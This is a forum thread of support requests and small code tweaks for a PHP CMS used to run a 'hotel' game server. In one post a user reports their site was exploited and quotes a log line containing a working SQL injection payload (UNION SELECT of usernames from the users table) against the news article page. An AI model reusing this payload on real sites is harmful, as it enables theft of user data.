Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Awesome release :) Everything is excellent so far. Trying to setup my client and I get the following error on the client page:
Title: Unknown column 'temp' in 'field list'
Text: Unknown column 'temp' in 'field list'
If anyone could help me out with this I would be happy! :]
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
I think the news article in this release may have an exploit, im using this and my hotel was exploited
found this in IIS logs:
Quote:
GET /articles/9001'+UNION+ALL+SELECT+NULL,+NULL,+NULL,+NULL,+NULL,+group_concat(username),+NULL,+NULL,+NULL,+NULL+FROM+users#+AND+'1'='1--mod-applications-closed - 80 - 80.223.213.212 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_7_2)+AppleWebKit/535.7+(KHTML,+like+Gecko)+Chrome/16.0.912.63+Safari/535.7 200 0 0 826
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Quote:
Originally Posted by
Dylannn
Awesome release :) Everything is excellent so far. Trying to setup my client and I get the following error on the client page:
Title: Unknown column 'temp' in 'field list'
Text: Unknown column 'temp' in 'field list'
If anyone could help me out with this I would be happy! :]
Dunno were that came from at all mon :huh:
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
I've added the last online.
Go to class.tpl and add under:
Code:
$this->SetParam('vipbalance', '<b>' . $users->GetUserVar(USER_ID, 'vip_points') . ' <img src="' . WWW . '/images/vipcoin.gif" style="vertical-align: middle;"></b>');
This:
PHP Code:
$this->SetParam('last', date("d-m-Y", $users->GetUserVar(USER_ID, 'last_online')));
Then go to comp-me and change this:
To:
Code:
Last signed in: %last%
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Quote:
Originally Posted by
bokeoke
I've added the last online.
Go to class.tpl and add under:
Code:
$this->SetParam('vipbalance', '<b>' . $users->GetUserVar(USER_ID, 'vip_points') . ' <img src="' . WWW . '/images/vipcoin.gif" style="vertical-align: middle;"></b>');
This:
PHP Code:
$this->SetParam('last', date("d-m-Y", $users->GetUserVar(USER_ID, 'last_online')));
Then go to comp-me and change this:
To:
Code:
Last signed in: %last%
wow, your so pro! /sacrasme
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Really nice Like it <'3
You're really nice <'3
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Quote:
Originally Posted by
Nills
wow, your so pro! /sacrasme
It's a big pleasure to hear this from you! :thumbup:
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Quote:
Originally Posted by
bokeoke
It's a big pleasure to hear this from you! :thumbup:
Oh very good <3!
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Can you answer this as its really annoying: Every time I add an image. Or change an image, I clear off my cache and restart the server, but the image changes dont apply. This is really important because I need to take off the xmas theme and I cannot do that!!! Please help me and tell me why this is doing it.
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Quote:
Originally Posted by
Subway
Dunno were that came from at all mon :huh:
Hmm, I might have added something wrong to the database. Thanks for this release though! :]
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
I'm personally not too keen on the news comments styling, but then that is very easy to modify and customise as to how I would prefer it to be.
Thanks for sharing this :)
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Quote:
Originally Posted by
Loduz
I'm personally not too keen on the news comments styling, but then that is very easy to modify and customise as to how I would prefer it to be.
Thanks for sharing this :)
http://t1.gstatic.com/images?q=tbn:A...JLDKLsZCxGxyCh
thanks I guess :mellow:
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
Got the client working :] Any idea on how to get the News Images to display? Or is it just me? I get a Grey box as the display.
Re: uberCMS/rCMS [PHP,OOP] Fixed Updated [Phoenix]
I've got an error! When I opened my hotelpage, i've got this!
Text: Could not execute cron job 'credits.php': could not locate script file.
Could someone help me? I'm using XAMPP.
Thanks anyway!